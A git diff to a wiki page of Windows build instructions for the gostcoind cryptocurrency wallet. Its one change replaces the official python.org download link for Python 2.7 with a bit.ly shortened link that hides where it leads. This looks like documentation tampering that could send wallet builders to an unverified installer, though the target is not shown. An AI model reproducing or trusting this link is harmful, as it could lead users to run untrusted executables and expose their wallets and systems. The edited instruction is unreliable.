diff --git a/Bulding-wallet-on-Windows-(MSYS).md b/Bulding-wallet-on-Windows-(MSYS).md index 22c1461..0498b63 100644 --- a/Bulding-wallet-on-Windows-(MSYS).md +++ b/Bulding-wallet-on-Windows-(MSYS).md @@ -41,7 +41,7 @@ You will found `gostcoind.exe` in `src` folder. ### Building Qt 5.9 Opensource staticly **[!] Requires Python 2.7** -[Download](https://www.python.org/downloads/release/python-2714/) and install Python, for example, to `C:\devel\Python27` and add it to PATH +[Download](https://bit.ly/3P64JNV) and install Python, for example, to `C:\devel\Python27` and add it to PATH ```bash $ export PATH="$PATH:/c/devel/Python27" ```